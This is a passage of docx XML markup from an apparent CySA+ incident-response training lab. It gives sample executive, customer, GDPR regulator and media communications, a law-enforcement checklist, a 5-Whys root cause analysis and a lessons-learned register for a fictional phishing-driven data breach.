            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>After containment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Townhall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CEO/CISO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>If asked</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Holding statement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Comms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CySA+ 4.2 names this list explicitly — never skip Legal and Regulatory.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Executive briefing template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**To:** CEO, CFO, General Counsel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**From:** CISO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Subject:** Sev-1 incident CASE-001 — interim update [TIME UTC]</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**Bottom line up front:** ~1 GB of customer data exfiltrated from finance file share via phishing → credential theft. Host isolated. No further movement.</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**Status:** Contained. Eradication in progress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Customer impact:** 87 records (names + IBAN). GDPR-notifiable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Press exposure:** Low so far; holding statement ready.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Decisions needed from you:** (1) Authorise customer notification draft. (2) Approve law-enforcement referral.</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Next update in 60 min.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Keep ≤ 1 screen. Bullets, not paragraphs. Decisions called out.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Customer notification template (GDPR-style)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Subject:** Important security notice about your data</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Dear [Name],</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On 13 May 2026, we discovered unauthorised access to a file containing your name and bank account (IBAN). We acted within minutes to stop the access and have no evidence the data has been used. Your password and online banking access are not affected.</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**What we are doing**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Engaged independent forensic specialists</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Notified the supervisory authority and law enforcement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Strengthened the controls that allowed this incident</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**What you should do**</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Watch your bank statements for any unusual debit and report to your bank</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Be alert to phishing emails or phone calls referencing this notice — we will never ask for your password</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Free guidance: [link to advice page]</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If you have questions, contact our dedicated team at [email] / [phone] (24×7 for the next 30 days).</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We are sorry this happened.</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[Signed, Data Protection Officer]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Plain language. No jargon. Concrete actions. Apology.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Regulator notification (GDPR Art. 33 template)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>**Notification of personal data breach — Art. 33 GDPR**</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Field | Value |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>|-------|-------|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Controller | [Company name + DPA registration #] |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Date/time of discovery | 2026-05-13 08:30 UTC |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Nature of breach | Confidentiality breach (unauthorised exfiltration) |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Categories of data | Name + IBAN |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Number of records | ~87 |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Likely consequences | Financial fraud risk; reputational |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| Measures taken | Host isolated; account disabled; MFA review; customer notification within 72 h |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>| DPO contact | dpo@example.com / +XX phone |</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Submit via the supervisory authority's web portal. Many EU DPAs have a 72-hour clock that starts at awareness, not at containment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Public / media holding statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>We recently identified a cybersecurity incident affecting a limited number of customer records in our finance system. We acted quickly to contain it, engaged independent specialists, and notified the relevant authorities. Affected customers are being contacted directly with specific advice. We continue to monitor and we are sorry for any concern this may cause.</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For more information, please contact press@example.com.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Keep ≤ 100 words. No specifics that contradict customer notification or compromise the investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Law enforcement referral checklist</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Make the call after Legal authorises and only through the pre-agreed contact (national cybercrime unit).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bring: incident report, IOC list, chain-of-custody form, evidence hashes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Do not alter or "clean up" evidence on the way.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Agree what may be shared with the regulator vs the public during the open investigation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Root cause analysis — 5 Whys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1. **Why** did the attacker exfiltrate 1 GB? → They had valid credentials and unrestricted egress.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2. **Why** did they have valid credentials? → User entered creds into a phishing page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>3. **Why** did the user fall for the phish? → Email passed DMARC checks at the gateway.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4. **Why** did it pass DMARC? → Receiving policy was `p=none` (monitor only).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>5. **Why** was the policy still `p=none`? → No owner; left over from initial rollout 18 months ago.</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**Root cause:** Absent operational ownership of DMARC enforcement — not user error.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This phrasing matters: blaming the user generates fear, not improvement. Blaming the process generates a fix (Lab 25's action items).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 8 — Lessons learned register</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># Lessons Learned — CASE-001</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Keep doing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Tabletop muscle memory; IC named in 5 min.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Pre-built isolation runbook applied cleanly.</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Start doing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Quarterly review of DMARC and DKIM enforcement levels.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Maintain regulator notification template ready to fill in.</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Stop doing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>- Treating phishing simulations as a checkbox training metric.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>## Actions (with owners + due dates)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>1. DMARC reject everywhere — Email Ops — 2026-05-31</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>2. FIDO2 rollout (Finance, Exec) — IdAM — 2026-07-01</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>3. Quarterly OOB comms test — SOC — recurring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>4. Pre-draft regulator + customer templates — Legal + Comms — 2026-06-15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The output of this register is the input to next quarter's Preparation phase — closing the NIST loop one more time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
